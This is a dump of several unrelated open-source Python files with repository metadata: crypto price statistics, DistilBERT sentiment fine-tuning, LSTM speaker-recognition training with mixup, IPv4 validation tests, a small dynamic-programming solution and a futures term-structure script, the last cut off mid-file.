\"2a. high (USD)\",\n \"2b. high (USD)\",\n \"3a. low (USD)\",\n \"3b. low (USD)\",\n \"4a. close (USD)\",\n \"4b. close (USD)\",\n \"5. volume\",\n \"6. market cap (USD)\"]\n\n#Function that request information from the API in JSON format\ndef get_data_from_api(api_token):\n try:\n payload = {'function':FUNCTION_TOKEN, 'symbol':SYMBOL_TOKEN, 'market':MARKET_TOKEN,'apikey':api_token}\n response = requests.get(API_URL_BASE,params=payload)\n\n if response.status_code >= 500:\n print('[!] [{0}] Server Error'.format(response.status_code))\n return None\n elif response.status_code == 404:\n print('[!] [{0}] URL not found: [{1}]'.format(response.status_code,api_url))\n return None\n elif response.status_code == 401:\n print('[!] [{0}] Authentication Failed'.format(response.status_code))\n return None\n elif response.status_code == 400:\n print('[!] [{0}] Bad Request'.format(response.status_code))\n return None\n elif response.status_code >= 300:\n print('[!] [{0}] Unexpected Redirect'.format(response.status_code))\n return None\n elif response.status_code == 200:\n print('URL API {0}'.format(response.url))\n json_data = json.loads(response.content.decode('utf-8'))\n return json_data\n else:\n print('[?] Unexpected Error: [HTTP {0}]: Content: {1}'.format(response.status_code, response.content))\n except exceptions.ConnectionError as e:\n print('[?] Connection Error: Check out internet connection or port access {0}'.format(e))\n response = 'No response'\n return None\n except ValueError:\n print('[?] Unexpected Error: [HTTP {0}]: Content: {1}'.format(response.status_code, response.content))\n return None\n return None\n\n#Function that converts the JSON object on Pandas DataFrame\n#Params: json_data = JSON object with data,\n# sort_asc_desc = True for ascending or False for descending sorting\n\ndef get_dataframe_from_json(json_data,sort_asc_desc):\n TIME_SERIES_API_TAG = 'Time Series (Digital Currency Daily)'\n JSON_OBJECT_COLUMNS = [\"1a. open (USD)\",\n \"1b. open (USD)\",\n \"2a. high (USD)\",\n \"2b. high (USD)\",\n \"3a. low (USD)\",\n \"3b. low (USD)\",\n \"4a. close (USD)\",\n \"4b. close (USD)\",\n \"5. volume\",\n \"6. market cap (USD)\"]\n\n time_series_json_data = json_data[TIME_SERIES_API_TAG]\n daily_crypto_records_list = [];\n\n for timestamp_cryptocurrency in time_series_json_data:\n selected_row = []\n selected_row.append(pd.to_datetime(timestamp_cryptocurrency))\n for item in JSON_OBJECT_COLUMNS:\n selected_row.append(float(time_series_json_data[timestamp_cryptocurrency][item]))\n daily_crypto_records_list.append(selected_row)\n\n daily_crypto_dataframe = pd.DataFrame(data=daily_crypto_records_list,columns=FILE_DATA_COLUMNS).sort_values([FILE_DATA_COLUMNS[0]],ascending=sort_asc_desc)\n\n return daily_crypto_dataframe\n\n#Save a dataframe to CSV file\n#Params: filename = name of the file, path = place to stare the file,\n# df_crypto_prices = pandas dataframe, index_flag = True to store indexs or False to not save index\ndef save_dataframe_to_csv(filename,path,df_crypto_prices,index_flag):\n try:\n timestamp_for_file = int((datetime.now() - datetime.utcfromtimestamp(0)).total_seconds())\n file_name_crypto_csv = '{0}/{1}_{2}.csv'.format(path,filename,timestamp_for_file)\n df_crypto_prices.to_csv(file_name_crypto_csv,encoding='utf-8',index=index_flag)\n except Exception as e:\n print(\"[?] Error: creating the file {0} {1}. More information {2}\".format(filename,path,e) )\n return False\n return file_name_crypto_csv\n\n#Function which is used in lambda function to compute relative_span per each week data\ndef relative_span_calc(cols):\n return ((cols['close_weekly_max_price']-cols['close_weekly_min_price'])/cols['close_weekly_min_price'])\n\n#Add timestamp from dataset as an index and drop unused columns\n#Params: df_daily_crypto = pandas dataframe with dayly close price values.\ndef get_dataFrame_transformed(df_daily_crypto):\n df_daily_crypto['date_time_index'] = df_daily_crypto[\"timestamp\"].apply( lambda df_daily_crypto : datetime(year=df_daily_crypto.year, month=df_daily_crypto.month, day=df_daily_crypto.day))\n df_daily_crypto.set_index(df_daily_crypto[\"date_time_index\"],inplace=True)\n return df_daily_crypto\n\n#Function which get weekly average and returns a dataframe with:\n# DatetimeIndex and the close weekly caluclations taking\n# as a base '4a. close (USD)' (value from the data API) values\n#Params: df_daily_crypto = pandas dataframe\ndef get_weekly_average_dataFrame(df_daily_crypto):\n df_daily_crypto = df_daily_crypto['4a. close (USD)'].astype('float')\n df_weekly_close_value = pd.Series.to_frame(df_daily_crypto.resample('W').mean())\n df_weekly_close_value.columns = ['close_weekly_average_price']\n return df_weekly_close_value\n\n#Computes the relative_span for all the data contained in the DataFrame And\n#Prints the week with the highest relative_span\ndef compute_relative_span_from_dataframe(df_daily_crypto):\n df_weekly_close_minmax = pd.Series.to_frame(df_daily_crypto.resample('W').max())\n df_weekly_close_minmax.columns = ['close_weekly_max_price']\n df_weekly_close_value_min = pd.Series.to_frame(df_daily_crypto.resample('W').min())\n df_weekly_close_value_min.columns = ['close_weekly_min_price']\n df_weekly_close_minmax['close_weekly_min_price'] = df_weekly_close_value_min['close_weekly_min_price']\n df_weekly_close_minmax.index = pd.to_datetime(df_weekly_close_minmax.index, unit='s')\n df_weekly_close_minmax['relative_span'] = df_weekly_close_minmax[['close_weekly_max_price','close_weekly_min_price']].apply(relative_span_calc,axis=1)\n week_datetime = df_weekly_close_minmax['relative_span'].idxmax()\n week_datetime = '{0}-{1}-{2}'.format(week_datetime.year,week_datetime.month,week_datetime.day)\n print('The week that finalized in \\'{0}\\' has the greates relative_span = {1}.'.format(week_datetime,df_weekly_close_minmax['relative_span'].max()))\n return None\n\n#Main function to call\n#Calculates Weekly average and save on disk.\n#And Calculates relative span for each week and prints the highest week with relative span in the dataset.\ndef compute_statistics_from_dataset():\n\n try:\n api_key = os.environ['API_KEY']\n dir_name = os.environ['FOLDER_NAME']\n\n json_data = get_data_from_api(api_key)\n\n\n if (len(json_data) > 1) and (json_data.get(ERROR_TAG_JSON_PROP) is None) :\n crypto_daily_dataframe = get_dataframe_from_json(json_data,ASC_ORDER)\n #Save file with the daily records in a CSV file\n filename = '{0}_{1}_{2}'.format(FUNCTION_TOKEN,SYMBOL_TOKEN,MARKET_TOKEN)\n is_created = save_dataframe_to_csv(filename,dir_name,crypto_daily_dataframe,False)\n\n if is_created is not False:\n print('{0} file has been created'.format(is_created))\n\n crypto_daily_dataframe = get_dataFrame_transformed(crypto_daily_dataframe)\n df_weekly_close_value = get_weekly_average_dataFrame(crypto_daily_dataframe)\n filename = 'WEEKLY_AVERAGE_PRICE_{0}_{1}'.format(SYMBOL_TOKEN,MARKET_TOKEN)\n is_created = save_dataframe_to_csv(filename,dir_name,df_weekly_close_value,True)\n\n if is_created is not False:\n print('{0} file has been created'.format(is_created))\n\n crypto_daily_dataframe = crypto_daily_dataframe['4a. close (USD)'].astype('float')\n compute_relative_span_from_dataframe(crypto_daily_dataframe)\n else:\n print('[?] get_data_from_api - Unexpected Error querying the API, error message: {0}'.format(json_data[ERROR_TAG_JSON_PROP]))\n except TypeError as e:\n tracing_error_module = traceback.format_exc()\n print('[?] Unexpected Error: \\n {0}'.format(tracing_error_module))\n except KeyError:\n print('[?] Enviroment Error: Be sure you are adding correctly the API_KEY and FILE_NAME variables.')\n\nprint(\"Computing calculations in the crypto dataset...\")\ncompute_statistics_from_dataset()\n","repo_name":"OmarFlores/assignment_2018","sub_path":"scripts/crypto_analysis.py","file_name":"crypto_analysis.py","file_ext":"py","file_size_in_byte":9198,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"28359559885","text":"import pandas as pd\nfrom sklearn.model_selection import train_test_split\nimport tensorflow as tf\nfrom transformers import TFAutoModelForSequenceClassification, AutoTokenizer\nfrom typing import Tuple\nimport zipfile\nimport os\n\nPRETRAINED_MODEL_NAME: str = \"distilbert-base-uncased\"\nTRAINING_DATASET_PATH: str = \"data/rotten_tomatoes_critic_reviews.csv\"\nMODEL_OUTPUT_PATH: str = \"./tuned_model\"\nEPOCHS: int = 3\nDATASET_ROWS_LIMIT: int = 100000\nRANDOM_STATE: int = 42\n\n\ndef load_dataset(file_path: str) -> pd.DataFrame:\n if not os.path.exists(file_path):\n zip_path = file_path + \".zip\"\n with zipfile.ZipFile(zip_path) as zip_file:\n zip_file.extractall(\"./data\")\n\n df = pd.read_csv(file_path)\n df = df[[\"review_content\", \"review_score\"]]\n df = df.dropna(subset=[\"review_content\", \"review_score\"])\n return df.sample(DATASET_ROWS_LIMIT, random_state=RANDOM_STATE)\n\n\ndef preprocess_dataset(df: pd.DataFrame, tokenizer: AutoTokenizer) -> Tuple[dict, list]:\n score_pattern = r\"^\\d+(\\.\\d+)?/\\d+(\\.\\d+)?$\"\n df = df[df[\"review_score\"].str.match(score_pattern)]\n normalized_scores = df[\"review_score\"].apply(\n lambda x: float(x.split(\"/\")[0]) / float(x.split(\"/\")[1])\n if float(x.split(\"/\")[1]) != 0\n else 0.0\n )\n\n inputs = tokenizer(\n df[\"review_content\"].tolist(),\n truncation=True,\n padding=True,\n max_length=256,\n add_special_tokens=True,\n return_attention_mask=True,\n )\n labels = normalized_scores.apply(\n lambda x: 2 if x > 0.6 else (1 if 0.5 <= x <= 0.6 else 0)\n )\n return inputs, labels\n\n\ndef split_dataset(inputs: dict, labels: list) -> Tuple:\n (\n train_inputs,\n test_inputs,\n train_mask,\n test_mask,\n train_labels,\n test_labels,\n ) = train_test_split(\n inputs[\"input_ids\"],\n inputs[\"attention_mask\"],\n labels,\n test_size=0.3,\n random_state=RANDOM_STATE,\n )\n\n train_dataset = tf.data.Dataset.from_tensor_slices(\n (\n dict(input_ids=train_inputs, attention_mask=train_mask),\n train_labels,\n )\n )\n test_dataset = tf.data.Dataset.from_tensor_slices(\n (\n dict(input_ids=test_inputs, attention_mask=test_mask),\n test_labels,\n )\n )\n\n return train_dataset, test_dataset\n\n\ndef train_model(\n train_dataset: tf.data.Dataset,\n test_dataset: tf.data.Dataset,\n) -> TFAutoModelForSequenceClassification:\n model = TFAutoModelForSequenceClassification.from_pretrained(\n PRETRAINED_MODEL_NAME, num_labels=3, dropout=0.3, attention_dropout=0.3\n )\n batch_size = 32\n optimizer = tf.keras.optimizers.Adam(learning_rate=2e-5, weight_decay=0.01)\n loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True)\n metrics = [\"accuracy\"]\n early_stopping_callback = tf.keras.callbacks.EarlyStopping(\n monitor=\"val_loss\", patience=2, restore_best_weights=True\n )\n\n model.compile(optimizer=optimizer, loss=loss, metrics=metrics)\n model.fit(\n train_dataset.shuffle(1000).batch(batch_size),\n epochs=EPOCHS,\n batch_size=batch_size,\n validation_data=test_dataset.batch(batch_size),\n callbacks=[early_stopping_callback],\n )\n return model\n\n\ndef main():\n tokenizer = AutoTokenizer.from_pretrained(PRETRAINED_MODEL_NAME)\n\n df: pd.DataFrame = load_dataset(TRAINING_DATASET_PATH)\n inputs, labels = preprocess_dataset(df, tokenizer)\n train_dataset, test_dataset = split_dataset(inputs, labels)\n\n model = train_model(train_dataset, test_dataset)\n model.save_pretrained(MODEL_OUTPUT_PATH)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"oscargullberg/movie-reviews-distilbert-sentiment-analysis","sub_path":"src/sentiment_analysis/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":3707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9900817550","text":"\"\"\"2 functions which calculate given input when called\r\nDudley Mutero\r\n13-4-14\"\"\"\r\n\r\ndef get_integer(text):\r\n #prompts user to input the 1st and second values of their permutations\r\n print(\"Enter \",text,\":\",sep=\"\")\r\n val=input()\r\n while not val.isdigit ():\r\n print (\"Enter \",text,\":\", sep=\"\")\r\n val=input()\r\n return eval (val)\r\n\r\n \r\ndef calc_factorial(text2):\r\n #calculates the factorial of given input\r\n nfactorial = 1\r\n for i in range (1, text2+1):\r\n nfactorial *= i \r\n return nfactorial\r\n","repo_name":"MrHamdulay/csc3-capstone","sub_path":"examples/data/Assignment_5/mtrdud001/mymath.py","file_name":"mymath.py","file_ext":"py","file_size_in_byte":528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"39871775349","text":"\"\"\"Performs training and testing of a neural network.\nTakes at the input audio features extracted from voice cleared audio\nFor dataset preparation use gen_audio_features.py script\"\"\"\n\n#region Imports\nimport datetime\nimport random\nimport argparse\nimport math\nfrom os.path import join, isdir, isfile\nfrom os import makedirs\nimport numpy as np\nimport tensorflow as tf\nimport keras\nfrom keras.models import Sequential, Model\nfrom keras.layers import Dense, CuDNNLSTM, Dropout, Reshape, TimeDistributed\nfrom keras.utils import to_categorical, multi_gpu_model\nfrom keras.callbacks import EarlyStopping\nfrom sklearn.model_selection import train_test_split, RepeatedStratifiedKFold\nfrom feature_extractor import FeatureExtractor\nfrom progress_bar import print_progress_bar\n#endregion\n\n\ndef compose_samples_with_timesteps(raw_features, num_timesteps, overlap_coeff=0.75):\n num_coeffs = raw_features.shape[1]\n num_windows = raw_features.shape[0]\n num_overlapped_timesteps = math.floor(num_timesteps*overlap_coeff)\n num_samples = math.floor(num_windows/num_overlapped_timesteps)\n # For simplicity Skip the last sample for the case\n # if num_windows is not divisible by num_samples\n if num_samples:\n num_samples -= 1\n timestep_samples = np.zeros((num_samples, num_timesteps, num_coeffs))\n for idx in range(num_samples):\n sample_start = idx*num_overlapped_timesteps\n sample_end = sample_start + num_timesteps\n timestep_samples[idx] = raw_features[sample_start:sample_end]\n return timestep_samples\n\n\ndef load_feature_from_file(path, num_timesteps):\n features_all = np.load(path)\n timestep_samples = compose_samples_with_timesteps(features_all, num_timesteps)\n return timestep_samples\n\n\ndef load_voxceleb_features(dataset_dir, list_path, num_timesteps, debug_mode):\n debug_break_number = 1000\n\n print('Started loading features from files...')\n time_start = datetime.datetime.now()\n\n f = open(list_path)\n f_list = list(f)\n f.close()\n\n features = []\n labels = []\n names_list = []\n\n num_files = len(f_list)\n print('Files to process: ', num_files)\n file_idx = 0\n print_progress_bar(iteration=file_idx, total=num_files,\n prefix='{}/{}'.format(file_idx, num_files), suffix='complete')\n\n for line in f_list:\n path, label = line.rstrip().split(' ')\n path = path[:-4] + '.npy'\n path = join(dataset_dir, path)\n label = int(label) - 1 # in Voxceleb classes starts from 1, shift to 0\n\n timestep_samples = load_feature_from_file(path, num_timesteps)\n stretched_label = np.full(timestep_samples.shape[0], label)\n stretched_name = np.full(timestep_samples.shape[0], line)\n\n if timestep_samples.shape[0] != 0:\n features.extend(timestep_samples)\n labels.extend(stretched_label)\n names_list.extend(stretched_name)\n\n file_idx += 1\n print_progress_bar(iteration=file_idx, total=num_files,\n prefix='{}/{}'.format(file_idx, num_files), suffix='complete')\n if debug_mode and file_idx == debug_break_number:\n print('\\nDebug mode. Interrupted on ', file_idx)\n break\n\n print('Dataset successfully processed and saved')\n time_end = datetime.datetime.now()\n print('Elapsed time: ', time_end-time_start)\n\n features = np.array(features)\n labels = np.array(labels)\n return features, labels, names_list\n\n\ndef load_cleared_audio(dataset_dir, files_list):\n print('Loading cleared audio files...')\n audio_all = []\n labels = []\n file_idx = 0\n num_files = len(files_list)\n print_progress_bar(iteration=file_idx, total=num_files,\n prefix='{}/{}'.format(file_idx, num_files), suffix='complete')\n for line in files_list:\n path, label = line.rstrip().split(' ')\n path = path[:-4] + '.npy' # eliminate .wav and add .npy\n path_to_file = join(dataset_dir, path)\n audio = np.load(path_to_file)\n audio_all.append(audio)\n labels.append(int(label)-1) # in Voxceleb classes starts from 1, shift to 0\n file_idx += 1\n print_progress_bar(iteration=file_idx, total=num_files,\n prefix='{}/{}'.format(file_idx, num_files), suffix='complete')\n return np.array(audio_all), np.array(labels)\n\n\ndef feature_mixup_augmentation(features, labels, alpha, num_to_mix):\n print('Started data augmentation using feature mixup...')\n time_start = datetime.datetime.now()\n\n mixup_features = []\n mixup_labels = []\n num_records = len(labels)\n\n indices = np.arange(num_records)\n np.random.shuffle(indices)\n features = features[indices]\n labels = labels[indices]\n\n num_same_class = 0\n for idx in range(num_records-num_to_mix+1):\n for mix_idx in range(num_to_mix-1):\n lam = np.random.beta(a=alpha, b=alpha)\n mixed_feat = lam * features[idx] + (1-lam) * features[idx+mix_idx+1]\n mixed_lab = lam * labels[idx] + (1-lam) * labels[idx+mix_idx+1]\n mixup_features.append(mixed_feat)\n mixup_labels.append(mixed_lab)\n\n if np.array_equal(labels[idx], labels[idx+mix_idx+1]):\n num_same_class += 1\n\n print_progress_bar(idx, num_records-num_to_mix,\n prefix='{}/{}'.format(idx+1, num_records-num_to_mix+1),\n suffix='complete')\n\n ratio = num_same_class/(num_to_mix*num_records)\n print('%.2f%% are mixed from the same class,\\\n \\n%.2f%% are mixed from different classes' % (ratio, 1-ratio))\n\n time_end = datetime.datetime.now()\n print('Elapsed time: ', time_end-time_start)\n return np.array(mixup_features), np.array(mixup_labels)\n\n\ndef audio_mixup_augmentation(paths_list, cleared_audio_dir, alpha, num_classes, sample_rate,\n num_coeffs, num_timesteps, num_to_mix):\n print('Started data augmentation using audio mixup...')\n time_start = datetime.datetime.now()\n mixup_features = []\n mixup_labels = []\n\n paths_list = list(dict.fromkeys(paths_list)) # remove all duplicates\n num_records = len(paths_list)\n np.random.shuffle(paths_list)\n audio, labels = load_cleared_audio(cleared_audio_dir, paths_list)\n labels = to_categorical(labels, num_classes)\n\n print('Augmentation:')\n num_same_class = 0\n for idx in range(num_records-num_to_mix+1):\n for mix_idx in range(num_to_mix-1):\n lam = np.random.beta(a=alpha, b=alpha)\n audio_size = len(audio[idx]) if len(audio[idx])= batch_size:\n labels = to_categorical(labels, num_classes)\n batch_index = 0\n yield (features[:batch_size], labels[:batch_size])\n #TODO: what if count of images is not divisible by batch_size?\n\n\ndef initialize_base_model(num_timesteps, num_coeffs, output_size):\n model = Sequential()\n\n model.add(CuDNNLSTM(256, return_sequences=True,\n input_shape=(num_timesteps, num_coeffs)))\n model.add(Dropout(0.2))\n\n model.add(CuDNNLSTM(128, return_sequences=True))\n model.add(Dropout(0.4))\n\n model.add(CuDNNLSTM(output_size, return_sequences=True))\n model.add(Dropout(0.5))\n\n return model\n\n\ndef parse_arguments():\n parser = argparse.ArgumentParser(description=\"Performing training and testing of \\\n a neural network\")\n parser.add_argument('--dataset_dir', required=True, default='',\n help=\"Path of directory containing features of voice \\\n cleared audio dataset in .npy binary format\")\n parser.add_argument('--dataset_list_path', required=True, default='',\n help=\"Path to txt file containing relative path to all \\\n audio in dataset\")\n parser.add_argument('--property_file_loc', required=True, default='',\n help=\"Path to property file\")\n parser.add_argument('--num_timesteps', type=int, default=20,\n help=\"(Optional) Number of timesteps per audio sample \\\n (default is 5 for better training of CuDNNLSTM layers)\")\n parser.add_argument('--batch_size', type=int, default=32)\n parser.add_argument('--num_epochs', type=int, default=10)\n parser.add_argument('--num_folds', type=int, default=5,\n help=\"Number of folds to do K-Fold cross validation\")\n parser.add_argument('--num_runs', type=int, default=10,\n help=\"Number of times for cross validation run\")\n parser.add_argument('--gpus', type=int, default=1,\n help=\"Number of GPUs to use in training\")\n parser.add_argument('--use_audio_mixup', action='store_true',\n help=\"Whether to use mixup of input audio or not\")\n parser.add_argument('--use_feature_mixup', action='store_true',\n help=\"Whether to use mixup of audio features or not\")\n parser.add_argument('--cleared_audio_dir', default='',\n help=\"Path of directory containing silence cleared \\\n audion dataset in .npy binary format\")\n parser.add_argument('--debug_mode', action='store_true',\n help=\"Whether to interrupt loading of all files to \\\n increase debugging speed\")\n args = parser.parse_args()\n return args\n\n\ndef main():\n #region Arguments reading\n args = parse_arguments()\n num_timesteps = args.num_timesteps\n batch_size = args.batch_size * args.gpus\n num_epochs = args.num_epochs\n num_gpus = args.gpus\n num_folds = args.num_folds\n num_runs = args.num_runs\n #endregion\n\n output_size_lstm = 64\n\n #region Property reading\n with open(args.property_file_loc, 'r') as prop_file:\n num_classes, num_coeffs = prop_file.readline().split(',')\n num_classes = int(num_classes)\n num_coeffs = int(num_coeffs)\n #endregion\n\n #region Data loading and preparation\n features, labels, names_list = load_voxceleb_features(dataset_dir=args.dataset_dir,\n list_path=args.dataset_list_path,\n num_timesteps=num_timesteps,\n debug_mode=args.debug_mode)\n names_list = np.array(names_list)\n #endregion\n\n #region Generators initializing\n # train_list, test_list, val_list = list_train_test_val_split(list_path=args.dataset_list_path,\n # num_classes=num_classes,\n # test_size=0.2, \n # val_size=0.1)\n # train_generator = arrays_generator(dataset_dir=args.dataset_dir,\n # subset_list=train_list,\n # subset='train',\n # num_timesteps=num_timesteps,\n # num_coeffs=num_coeffs,\n # num_classes=num_classes,\n # batch_size=batch_size)\n # test_generator = arrays_generator(dataset_dir=args.dataset_dir,\n # subset_list=test_list,\n # subset='test',\n # num_timesteps=num_timesteps,\n # num_coeffs=num_coeffs,\n # num_classes=num_classes,\n # batch_size=batch_size)\n # val_generator = arrays_generator(dataset_dir=args.dataset_dir,\n # subset_list=val_list,\n # subset='val',\n # num_timesteps=num_timesteps,\n # num_coeffs=num_coeffs,\n # num_classes=num_classes,\n # batch_size=batch_size)\n #endregion\n\n time_start = datetime.datetime.now() # time for training\n\n # define k-fold cross validation test harness\n kfold = RepeatedStratifiedKFold(n_splits=num_folds, n_repeats=num_runs)\n acc_scores = []\n run_idx = 1\n fold_idx = 1\n\n for train, test in kfold.split(features, labels):\n fold_time_start = datetime.datetime.now()\n print('--------------- Run {}: fold {} ---------------'.format(run_idx, fold_idx))\n if fold_idx == num_folds:\n fold_idx = 0\n run_idx += 1\n fold_idx += 1\n\n #region Model initializing\n if num_gpus <= 1:\n base_model = initialize_base_model(num_timesteps, num_coeffs, output_size_lstm)\n x = base_model.output\n # reshape 3D output of LSTM to 2D form\n x = Reshape((num_timesteps*output_size_lstm,))(x)\n predictions = Dense(num_classes, activation='softmax')(x)\n model = Model(inputs=base_model.input, outputs=predictions)\n else:\n with tf.device(\"/cpu:0\"):\n base_model = initialize_base_model(num_timesteps, num_coeffs, output_size_lstm)\n x = base_model.output\n # reshape 3D output of LSTM to 2D form\n x = Reshape((num_timesteps*output_size_lstm,))(x)\n predictions = Dense(num_classes, activation='softmax')(x)\n model = Model(inputs=base_model.input, outputs=predictions)\n model = multi_gpu_model(model, gpus=num_gpus)\n #endregion\n\n opt = keras.optimizers.Adam(lr=0.001, beta_1=0.9, beta_2=0.999,\n epsilon=None, decay=0.0, amsgrad=False)\n loss = 'categorical_crossentropy'\n\n model.compile(loss=loss,\n optimizer=opt,\n metrics=['accuracy'])\n\n es = EarlyStopping(monitor='acc', patience=10, verbose=1, restore_best_weights=True)\n\n onehot_labels = to_categorical(labels, num_classes)\n\n x_train = features[train]\n y_train = onehot_labels[train]\n\n if args.use_feature_mixup:\n mixup_features, mixup_labels = feature_mixup_augmentation(x_train, y_train,\n alpha=5,\n num_to_mix=2)\n x_train = np.concatenate((x_train, mixup_features), axis=0)\n y_train = np.concatenate((y_train, mixup_labels), axis=0)\n\n if args.use_audio_mixup:\n mixup_features, mixup_labels = audio_mixup_augmentation(paths_list=names_list[train],\n cleared_audio_dir=args.cleared_audio_dir,\n alpha=1000,\n num_classes=num_classes,\n sample_rate=16000,\n num_coeffs=40,\n num_timesteps=25,\n num_to_mix=2) #TODO: eliminate consts\n x_train = np.concatenate((x_train, mixup_features), axis=0)\n y_train = np.concatenate((y_train, mixup_labels), axis=0)\n\n #region Model.fit\n model.fit(x_train, y_train,\n batch_size=batch_size,\n epochs=num_epochs,\n verbose=1,\n shuffle=True,\n callbacks=[es])\n #endregion\n\n #region Model.fit_generator\n # num_train_samples = len(train_list)\n # train_gen_len = num_train_samples // batch_size\n # num_val_samples = len(val_list)\n # val_gen_len = num_val_samples // batch_size\n # model.fit_generator(generator=train_generator,\n # steps_per_epoch=train_gen_len,\n # epochs=num_epochs,\n # verbose=1,\n # validation_data=val_generator,\n # validation_steps=val_gen_len,\n # shuffle=True)\n #endregion\n\n print('\\nModel evaluation...')\n\n print('Start preparing test data...')\n x_test, y_test = audio_mixup_augmentation(paths_list=names_list[test],\n cleared_audio_dir=args.cleared_audio_dir,\n alpha=1000,\n num_classes=num_classes,\n sample_rate=16000,\n num_coeffs=40,\n num_timesteps=25,\n num_to_mix=2) #TODO: eliminate consts\n\n #region Model.evaluate\n loss_and_metrics = model.evaluate(x_test, y_test,\n batch_size=batch_size,\n verbose=1)\n #endregion\n\n #region Model.evaluate_generator\n # num_test_samples = len(test_list)\n # test_gen_len = num_test_samples // batch_size\n # loss_and_metrics = model.evaluate_generator(generator=test_generator,\n # steps=test_gen_len,\n # verbose=1)\n #endregion\n\n print(\"%s: %.5f\\n%s: %.2f%%\" % (model.metrics_names[0], loss_and_metrics[0],\n model.metrics_names[1], (loss_and_metrics[1]*100)))\n acc_scores.append(loss_and_metrics[1] * 100)\n\n fold_time_end = datetime.datetime.now()\n print('Elapsed time: ', fold_time_end-fold_time_start)\n\n #region Model saving\n model_name = 'model_000{}_{}_folds'.format(fold_idx-1, num_folds)\n save_loc = './models/' + model_name #TODO: will not work on Windows\n if not isdir(save_loc):\n makedirs(save_loc)\n model.save(join(save_loc, (model_name+'.h5')))\n print('Model saved in root directory of project in ', save_loc)\n\n with open(join(save_loc, 'train_list.txt'), 'w') as lst:\n for line in names_list[train]:\n lst.write(line)\n with open(join(save_loc, 'test_list.txt'), 'w') as lst:\n for line in names_list[test]:\n lst.write(line)\n #endregion\n\n print('Average accuracy: %.2f%% (+/- %.2f%%)' % (np.mean(acc_scores), np.std(acc_scores)))\n\n time_end = datetime.datetime.now()\n print('Elapsed time for the whole process: ', time_end-time_start)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"nikitashvarts/CocktailPartySpeakerRecognition","sub_path":"model_train_test.py","file_name":"model_train_test.py","file_ext":"py","file_size_in_byte":22497,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"40"} +{"seq_id":"24051941988","text":"import ipaddress\nimport unittest\nfrom net_min import is_valid_ipv4, min_network\n\n\nclass TestMethods(unittest.TestCase):\n\n valid_ipv4_addresses = [\n '192.168.1.100',\n '10.0.0.1',\n '213.151.0.8',\n '77.77.77.77'\n ]\n\n invalid_ipv4_addresses = [\n '666.1.2.2',\n '256.256.256.256',\n '0.567.567.567',\n '192.168.0.257'\n ]\n\n def test_is_invalid_ip_addresses(self):\n\n for address in self.invalid_ipv4_addresses:\n status = is_valid_ipv4(address)\n self.assertFalse(status)\n\n def test_is_valid_ip_addresses(self):\n for address in self.valid_ipv4_addresses:\n status = is_valid_ipv4(address)\n self.assertTrue(status)\n\n def test_find_min_network(self):\n ip_list = ['192.168.0.0', '192.168.2.245', '192.168.255.255']\n self.assertEqual(min_network(ip_list),\n ipaddress.IPv4Network('192.168.0.0/16'))\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"kirolga/net_min","sub_path":"tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":1003,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"6754636654","text":"import sys\nr = lambda: sys.stdin.readline().strip()\nif __name__ == '__main__':\n\tn = int(r())\n\tarr = [int(r()) for _ in range(n)]\n\n\tmemo = [[0]*2 for _ in range(n+1)]\n\tmemo[1][0]=arr[0]\n\tif(n==1):\n\t\tprint(arr[0])\n\telse:\n\t\tmemo[2][0]=arr[1]\n\t\tmemo[2][1]=arr[1]+memo[1][0]\n\t\tfor i in range(3,n+1):\n\t\t\tmemo[i][0] = max(memo[i-2][0],memo[i-2][1],memo[i-3][1]) + arr[i-1]\n\t\t\tmemo[i][1] = memo[i-1][0] + arr[i-1]\n\t\tprint(max(memo[n][0],memo[n][1],memo[n-1][1]))","repo_name":"trevor91/algorithm","sub_path":"beakjoon/2156.py","file_name":"2156.py","file_ext":"py","file_size_in_byte":454,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9087654759","text":"from sys import argv, path\n\npath.append(\".\")\n\nfrom util.contract_settings import get_settings\nfrom util.parsers import tas_rec\nfrom util.rec_tools import get_precision\nfrom util.term_structure import get_terms\n\n\n# python charts/term_chg_table.py NGM23 2023-03-27T00:00:00 2023-03-28T00:00:00 0\n\n# NGJ23 starting symbol\n# 12 12 consecutive terms, starting at J23\n# \"2023-03-22T06:00:00.000000\" start ts\n# \"2023-03-22T07:00:00.000000\" end ts\n# 1 print tas records\n\n\nMONTHS = [ \"F\", \"G\", \"H\", \"J\", \"K\", \"M\", \"N\", \"Q\", \"U\", \"V\", \"X\", \"Z\"]\nFMT = \"%Y-%m-%dT%H:%M:%S.%f\"\nFIELD_WIDTH = 10\n\n\ndef process_records(\n recs,\n contract_id,\n precision,\n print_recs\n):\n\n if print_recs:\n\n print(f\"{contract_id}\\n\")\n\n\n start_price = recs[0][tas_rec.price]\n end_price = recs[-1][tas_rec.price]\n count = 0\n at_bid = 0\n at_ask = 0\n\n for rec in recs:\n\n price = f\"{rec[tas_rec.price]: {FIELD_WIDTH}.{precision}f}\"\n qty = f\"{rec[tas_rec.qty]: {FIELD_WIDTH}d}\"\n side = None\n\n if rec[tas_rec.side] == 0:\n\n at_bid += 1\n side = \"bid\".rjust(FIELD_WIDTH)\n \n else:\n\n at_ask += 1\n side = \"ask\".rjust(FIELD_WIDTH)\n\n count += 1\n\n if print_recs:\n\n print(rec[tas_rec.timestamp].ljust(20), price, qty, side)\n\n if print_recs:\n \n print(\"\\n\")\n\n return ( contract_id, start_price, end_price, count, at_bid, at_ask )\n\n\nif __name__ == \"__main__\":\n\n init_symbol = argv[1]\n multiplier, _ = get_settings(init_symbol)\n precision = get_precision(float(multiplier))\n multiplier = float(multiplier)\n n_months = int(argv[2])\n start = argv[3]\n end = argv[4]\n print_recs = int(argv[5])\n \n terms = get_terms(\n init_symbol,\n multiplier,\n n_months,\n FMT,\n start,\n end\n )\n \n results = []\n\n for contract_id, recs in 